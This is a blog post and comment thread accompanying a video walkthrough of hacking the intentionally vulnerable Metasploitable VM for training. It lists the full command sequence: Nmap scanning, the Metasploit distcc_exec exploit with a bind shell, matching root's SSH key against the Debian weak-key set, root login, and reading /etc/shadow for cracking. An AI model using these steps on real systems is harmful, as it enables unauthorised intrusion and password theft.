Watch video on-line: http://g0tmi1k.blip.tv/file/3826063
Download video: http://www.mediafire.com/?mpxdj30sx66t4lv
Download (debian_ssh_rsa_2048_x86.tar.bz2): http://www.mediafire.com/?i2mnwymzt51
What is this?
This video demonstrates an attack on the DistCC service on the metasploitable hackable box.
"Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql." - blog.metasploit.com
"distcc is a program to distribute builds of C, C++, Objective C or Objective C++ code across several machines on a network. distcc should always generate the same results as a local build, is simple to install and use, and is usually much faster than a local compile"- distcc.samba.org
Guide
> Use Nmap to scan the network (gathering information)
> Use Nmap to do a more detailed scan of the target (gathering information)
> Use Metasploit to send a payload (remote access)
> *I cheated a little bit here as I had used nessus in a previous scan to discover "Debian OpenSSH/OpenSSL Package Random Number Generator Weakness"*
> Via the payload it is possible to capture the SSH Key and compare it against the weak keys *Just like pWnOS* (escalating privileges)
> Connect via SSH as root (complete access)
> Prove complete access by cracking the shadow file with John The Ripper (then prove it by connecting via SSH using one of the newly acquired accounts)
What do I need?
> Nmap --- on Backtrack 4 (Final)
> Metasploit --- on Backtrack 4 (Final)
> SSH --- on Backtrack 4 (Final)
> Weak SSH Keys (debian_ssh_rsa_2048_x86.tar.bz2) ---http://www.mediafire.com/?i2mnwymzt51
> Metasploitable.vmdk (SHA-1: 7DF98130DAC3167690209716EBF86047C6B9672F)
> Metasploitable.part01.rar ~ http://www.mediafire.com/?dy2jl2wmw5h (SHA-1: 76388A5648ADAAAE9E5841AB5B0F660777A28E36)
> Metasploitable.part02.rar ~ http://www.mediafire.com/?3zrz2wjmjmz (SHA-1: 48B9807812CE7561C5F86667630B9E40D3DD85FA)
> Metasploitable.part03.rar ~ http://www.mediafire.com/?nmjmyimmqwm (SHA-1: EAAA89F4A24F3B37C27ACECD8580CE95EC39BA34)
> Metasploitable.part04.rar ~ http://www.mediafire.com/?gdjyzfjyjzm (SHA-1: FB1CDD02115F43AC53FDDA9499F1ED8ED2BF5EE2)
Commands:
nmap 192.168.1.1/24 nmap -sS -sV -p1-65535 -O -f -n -v 192.168.1.105 msfconsole search distcc use exploit/unix/misc/distcc_exec show options setg RHOST 192.168.1.105 show payloads setg payload generic/cmd/unix/bind_perl show options exploit ls whoami ls -lart/root ls -lart/root/ .ssh cat /root/.ssh/authorized_keys ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable Firefox www.exploit-db.com -> Debian OpenSSL Predictable (5720) -> http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2 tar jxvf debian_ssh_rsa_2048_x86.tar.bz2 cd rsa/2048/ grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.105 whoami hostname ifconfig cat /etc/shadow
Notes:
Song: Josh Abrahams - Joker
Video length: 4:51
Capture length: 6:28
Blog Post: http://g0tmi1k.blogspot.com/2010/07/video-metasploitable-distcc.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/30079-%5Bvideo%5D-metasploitable-distcc.html#post167045
~g0tmi1k
First: Thank you for posting great video's like these, i like them!
ReplyDeleteHowever i am unable to use the metaploitable because i am unable to download:
Metasploitable.part03.rar
It seems the link is broken, i downloaded part 1 2 and 4 succesfully.
@Mario
ReplyDeleteIt looks like part3 is working again. (=
@g0tmi1k
ReplyDeleteThank you for the response, now i can follow all of your videos on metasploit and gain more knowledge :p
@Mario
ReplyDeleteThanks for letting me know its working for you!
Hope you have fun with it ;)
Whats the username and password of your metasploitable image?
ReplyDeletethx for your howto ;)
@Bubi
ReplyDeleteThats the idea of the metasploitable, you have to hack it to gain access. Your not meant to know the username/password when you start.
hey g0tmi1k, how exactly does this exploit work? i just followed your video and gained root access to the metasploitable box but i'm more interested in how exactly this works. I saw that you used nessus to find the OpenSSL vulnerability, however how did you know how to use the exploit? I've gone to exploit-db and looked through the exploits for this vuln and none of them have done it the same you have here. I guess I'm just highly curious. Thanks for your time :)
ReplyDeleteAlso, if you had NOT found the vuln via Nessus, what would you have done once you ran "exploit" from metasploit console and gained a shell? What steps would you have taken at that point to further penetrate the system? Thanks again!
ReplyDelete@MuLiTiAx
ReplyDeleteBest way to understand how the exploits works, is by reading any advisories and then the exploit code itsself ;) *see the links below*
In short, if distcc isn't "correctly" configured, as there is a mistake in the code that doesn't check to see if the user is authorizate, and just executes their commands.
You find vulnerability by enumeration, enumeration and more enumeration!
I skipped this stage out of the video - as I was trying to keep it short & its the same for every vulnerability in metasploitable (didn't want to do it 5 timse!)
One way of finding it out, port scan (unicornscan/nmap), banner grab(netcat/amap/nmap), search exploit database(exploit-db.com/1337day.com), exploit it!
One of Nessus features is automate the above as it can, ports scans, then enumerates to see what service is running and protentional version by fingerprinting, and then has a in-built database for known vulnerability which is checks.
Overall, before I recorded the video, there was lots of trying, lots of times whatever I was doing failed.
You might want to check out the "pentest standard" link too....
Well, the exploit used, gave me remote root access, and there isn't any higher level of user to reach - hence why I didn't need to "further penetrate the system".
If you mean, Privilege Escalation (e.g. How do get root?), thats not a simple task. Most boot2roots use "kernel" exploits, but normally - its harder than that. For a rough idea, see here: http://g0tmi1k.blogspot.com/2011/08/basic-linux-privilege-escalation.html
If you mean, is there another way in, there are other vulns in the system too (see the other 4 videos).
The system/VM was meant to be broken, so these entry points where added in.
--- Links ---
CVE Link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2004-2687
*distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks*
OSVDB Link: http://osvdb.org/13378
*distcc contains a flaw that may allow a malicious user to execute arbitrary commands. distcc does not perform any authentication or authorization of connections, and instead relies on 3rd party access controls. It is possible that the flaw may allow arbitrary command execution resulting in a loss of integrity.*
The metasploit exploit module: http://www.metasploit.com/modules/exploit/unix/misc/distcc_exec
Metasploit Exploit source code: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/unix/misc/distcc_exec.rb
Nessus: http://www.nessus.org/plugins/index.php?view=single&id=12638
Pentest Standard: http://www.pentest-standard.org/index.php/Main_Page
In short, there isn't a magic answer - just lots of enumeration and attempts which usually fail ;)
ReplyDeletesıcak videolar
ReplyDeletesıcak videolar
ReplyDeleteHey there, your videos are great and thanks for sharing!
ReplyDeleteOne question that i dont understand in the specific video...you find in the file /root/.ssh/authorized_keys a public key. This key i can see that belongs to msfadmin. BUT you use the corresponding private key in ssh to log as a root and not as msfadmin...why you do this ? you guess that they use the same private key?? are they both administrator accounts???
TIA